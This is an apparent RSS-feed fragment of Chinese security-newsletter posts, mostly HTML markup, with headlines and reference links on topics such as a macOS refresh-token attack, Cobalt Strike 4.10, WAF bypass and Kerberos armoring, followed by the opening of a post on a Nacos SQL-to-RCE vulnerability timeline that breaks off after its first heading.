	</section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 MacOS上未公开实现的主要刷新令牌攻击</span></h3>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card mp_common_widget" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZl3sr69R3RNdcS6v0nMIWuXTwtWUP5IGNBMnCvoibjibE5pA7c8pRp94Un7eVjlAdUFvA0FqSWicEgTw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZl3sr69R3RNdcS6v0nMIWuXTwtWUP5IGNBMnCvoibjibE5pA7c8pRp94Un7eVjlAdUFvA0FqSWicEgTw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122481812222254"></mp-common-miniprogram>
	</section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 保护工具：检测技术</span></h3>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card mp_common_widget" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZl3sr69R3RNdcS6v0nMIWuXTGvuzQXup9r4dPcwRcRRVuTKRwMGkiczzRvGibmP7QGUvHshSzl9ASvg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZl3sr69R3RNdcS6v0nMIWuXTGvuzQXup9r4dPcwRcRRVuTKRwMGkiczzRvGibmP7QGUvHshSzl9ASvg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522185851528122"></mp-common-miniprogram>
	</section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 Cobalt Strike 4.10发布：引入BeaconGate和Sleepmask-VS</span></h3>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card mp_common_widget" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3ZaQlnCnBsJGqF63MmoGcw4Hqs0KlYuHeCZC5gjMicdmVJdgFxypr9AQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3ZaQlnCnBsJGqF63MmoGcw4Hqs0KlYuHeCZC5gjMicdmVJdgFxypr9AQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855418148142481"></mp-common-miniprogram>
	</section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 统一代理规则：绕过WAF的强大工具</span></h3>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card mp_common_widget" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3h2YgE5TU2GMDQ9mSmZpz9Ah4msC0dFMFIOq4GeUlCmkINYTftLyajw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3h2YgE5TU2GMDQ9mSmZpz9Ah4msC0dFMFIOq4GeUlCmkINYTftLyajw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855418142582551"></mp-common-miniprogram>
	</section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x07
			 加强Kerberos安全：理解Kerberos Armoring的必要性</span></h3>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card mp_common_widget" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3icks6WvFgJKlfkZfxk1YMKdQdfhCuLoypFIRsn5LVVL91U3RO9yWdQQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3icks6WvFgJKlfkZfxk1YMKdQdfhCuLoypFIRsn5LVVL91U3RO9yWdQQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855418142848511"></mp-common-miniprogram>
	</section>
	<pre style="margin-top: 10px;margin-bottom: 10px;color: rgb(0, 0, 0);font-size: 16px;letter-spacing: normal;text-align: left;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="margin-bottom: -7px;display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/98Nz5LFElxzdExAnJcAwRIq2IIHILR4B4jrwEPb1lOJkr0MbPEpgEGkibpic5JdqX37KQGhyH9pyMEjvn4Ve17KgmCXxV6NBIw/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 558px;border-radius: 5px;"></span><code style="padding: 15px 16px 16px;overflow-x: auto;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;">部分能力后期会开放，比如知识库/迪斯科等，星球身份是后期各服务的通行证<br/>AI目前比较贵，为了可持续发展，设置了星球的地板价<span style="color: rgb(209, 154, 102);line-height: 26px;">25</span>元(系统最低价)</code></pre>
	<p style="text-align: center;"><img class="rich_pages wxw-img js_darkmode__16" data-galleryid="" data-imgfileid="100003701" data-ratio="0.575925925925926" data-s="300,640" data-type="png" data-w="1080" style="color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;letter-spacing: normal;text-align: center;visibility: visible !important;width: 657px !important;height: auto !important;" width="677px" src="https://wechat2rss.xlab.app/img-proxy/?k=884dd4e7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnoZE3o2M5pWUSdvydKbsn5xaQ0PicicMvUtGqYwKthtBwkQ0YY4jQ69HMp6mQnK9n7LN8Mpvc8JSGg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%26tp%3Dwebp%26wxfrom%3D5%26wx_lazy%3D1%26wx_co%3D1"/></p>
</section><p>

</p><section class="footnotes-sep" style="-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);border-radius:0px;border:3px none rgba(0, 0, 0, 0.4);box-sizing:border-box !important;color:rgba(0, 0, 0, 0.85);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:30px 0px 15px;max-width:100%;orphans:2;overflow-wrap:break-word !important;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;">
	<p style="margin-left:0px;"><span style="color:rgb(0,0,0);font-size:18px;"><span style="box-sizing:border-box !important;display:block;letter-spacing:0em;line-height:1.5em;margin-bottom:0px;margin-right:0px;margin-top:0px;max-width:100%;overflow-wrap:break-word !important;padding:0px;"><strong>参考资料</strong></span></span>
	</p>
</section><p>
</p><section class="footnotes" style="-webkit-text-stroke-width:0px;background-attachment:scroll;background-clip:border-box;background-image:none;background-origin:padding-box;background-position:0% 0%;background-repeat:no-repeat;background-size:auto;border-radius:0px;border:3px none rgba(0, 0, 0, 0.4);box-sizing:border-box !important;color:rgba(0, 0, 0, 0.85);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:0px;max-width:100%;orphans:2;overflow-wrap:break-word !important;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
	<p><span style="color:rgba(0,0,0,0.6);font-family:ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size:11.2px;"><span class="footnote-num" style="-webkit-text-stroke-width:0px;box-sizing:border-box;display:inline;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0em;line-height:1.8em;orphans:2;padding-top:2px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:30.3984px;word-spacing:0px;">[1]</span></span>《通过未公开的Windows API进行远程会话枚举》:
		<em style="background-color:rgba(0, 0, 0, 0);border-radius:0px;border:3px none rgba(0, 0, 0, 0.4);box-sizing:border-box;color:rgb(0, 0, 0);font-weight:normal;height:auto;width:auto;"><i><a href="https://0xv1n.github.io/posts/sessionenumeration/" target="_blank">https://0xv1n.github.io/posts/sessionenumeration/</a></i></em>
	</p><p><span style="color:rgba(0,0,0,0.6);font-family:ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size:11.2px;"><span class="footnote-num" style="-webkit-text-stroke-width:0px;box-sizing:border-box;display:inline;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0em;line-height:1.8em;orphans:2;padding-top:2px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:30.3984px;word-spacing:0px;">[2]</span></span>《常见HTTP 403错误绕过工具介绍第二部分》:
		<em style="background-color:rgba(0, 0, 0, 0);border-radius:0px;border:3px none rgba(0, 0, 0, 0.4);box-sizing:border-box;color:rgb(0, 0, 0);font-weight:normal;height:auto;width:auto;"><i><a href="https://ott3rly.com/common-403-bypasses-part-2/" target="_blank">https://ott3rly.com/common-403-bypasses-part-2/</a></i></em>
	</p><p><span style="color:rgba(0,0,0,0.6);font-family:ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size:11.2px;"><span class="footnote-num" style="-webkit-text-stroke-width:0px;box-sizing:border-box;display:inline;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0em;line-height:1.8em;orphans:2;padding-top:2px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:30.3984px;word-spacing:0px;">[3]</span></span>《MacOS上未公开实现的主要刷新令牌攻击》:
		<em style="background-color:rgba(0, 0, 0, 0);border-radius:0px;border:3px none rgba(0, 0, 0, 0.4);box-sizing:border-box;color:rgb(0, 0, 0);font-weight:normal;height:auto;width:auto;"><i><a href="https://troopers.de/troopers24/talks/3vlccy/" target="_blank">https://troopers.de/troopers24/talks/3vlccy/</a></i></em>
	</p><p><span style="color:rgba(0,0,0,0.6);font-family:ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size:11.2px;"><span class="footnote-num" style="-webkit-text-stroke-width:0px;box-sizing:border-box;display:inline;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0em;line-height:1.8em;orphans:2;padding-top:2px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:30.3984px;word-spacing:0px;">[4]</span></span>《保护工具：检测技术》:
		<em style="background-color:rgba(0, 0, 0, 0);border-radius:0px;border:3px none rgba(0, 0, 0, 0.4);box-sizing:border-box;color:rgb(0, 0, 0);font-weight:normal;height:auto;width:auto;"><i><a href="https://github.com/mgeeky/ProtectMyTooling" target="_blank">https://github.com/mgeeky/ProtectMyTooling</a></i></em>
	</p><p><span style="color:rgba(0,0,0,0.6);font-family:ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size:11.2px;"><span class="footnote-num" style="-webkit-text-stroke-width:0px;box-sizing:border-box;display:inline;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0em;line-height:1.8em;orphans:2;padding-top:2px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:30.3984px;word-spacing:0px;">[5]</span></span>《Cobalt Strike 4.10发布：引入BeaconGate和Sleepmask-VS》:
		<em style="background-color:rgba(0, 0, 0, 0);border-radius:0px;border:3px none rgba(0, 0, 0, 0.4);box-sizing:border-box;color:rgb(0, 0, 0);font-weight:normal;height:auto;width:auto;"><i><a href="https://www.cobaltstrike.com/blog/cobalt-strike-410-through-the-beacongate" target="_blank">https://www.cobaltstrike.com/blog/cobalt-strike-410-through-the-beacongate</a></i></em>
	</p><p><span style="color:rgba(0,0,0,0.6);font-family:ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size:11.2px;"><span class="footnote-num" style="-webkit-text-stroke-width:0px;box-sizing:border-box;display:inline;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0em;line-height:1.8em;orphans:2;padding-top:2px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:30.3984px;word-spacing:0px;">[6]</span></span>《统一代理规则：绕过WAF的强大工具》:
		<em style="background-color:rgba(0, 0, 0, 0);border-radius:0px;border:3px none rgba(0, 0, 0, 0.4);box-sizing:border-box;color:rgb(0, 0, 0);font-weight:normal;height:auto;width:auto;"><i><a href="https://www.sprocketsecurity.com/resources/gigaproxy" target="_blank">https://www.sprocketsecurity.com/resources/gigaproxy</a></i></em>
	</p><p><span style="color:rgba(0,0,0,0.6);font-family:ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size:11.2px;"><span class="footnote-num" style="-webkit-text-stroke-width:0px;box-sizing:border-box;display:inline;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0em;line-height:1.8em;orphans:2;padding-top:2px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:30.3984px;word-spacing:0px;">[7]</span></span>《加强Kerberos安全：理解Kerberos Armoring的必要性》:
		<em style="background-color:rgba(0, 0, 0, 0);border-radius:0px;border:3px none rgba(0, 0, 0, 0.4);box-sizing:border-box;color:rgb(0, 0, 0);font-weight:normal;height:auto;width:auto;"><i><a href="https://www.hub.trimarcsecurity.com/post/securing-the-chink-in-kerberos-armor-fast-understanding-the-need-for-kerberos-armoring" target="_blank">https://www.hub.trimarcsecurity.com/post/securing-the-chink-in-kerberos-armor-fast-understanding-the-need-for-kerberos-armoring</a></i></em>
	</p>
</section><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487441">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2974ea47&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487441%26idx%3D1%26sn%3Dfb0f6a6a153e122770ac44383f8699a9%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 17 Jul 2024 08:26:00 +0800</pubDate>
    </item>
    <item>
      <title>Nacos 事件脉络，沉睡4年的 sql 2 rce</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487376&amp;idx=1&amp;sn=91811b4060ac53269a79bc93f947f827</link>
      <description>Nacos安全漏洞时间脉络，横跨 2020 ～ 2024 的 sql 2 rce</description>
      <content:encoded><![CDATA[<p>
<span></span> <span>2024-07-16 08:20</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>Nacos安全漏洞时间脉络，横跨 2020 ～ 2024 的 sql 2 rce</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=751ad7e1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDRNNWSpgibMsOOtfibqtibK2u8oibNRVqtia7gnsfnKPyib5pTvqxIynW8cOg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="color: rgb(0, 0, 0);font-size: 16px;letter-spacing: 0em;word-spacing: 0em;text-wrap: wrap;margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;line-height: 1.5em;word-break: break-word;text-align: left;"><h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 1593px;-webkit-box-reflect: unset;"><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 1593px;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-07-16 安全「信息差」<span style="line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 1593px;height: auto;align-items: unset;box-shadow: none;display: block;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span></h1><blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">1. 推送「新、热、赞」，降噪增效<br/></p><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">2. 查漏补缺，你可能错过了一些小东西</p></blockquote><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01 2020: Nacos安全漏洞导致无认证SQL执行</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" 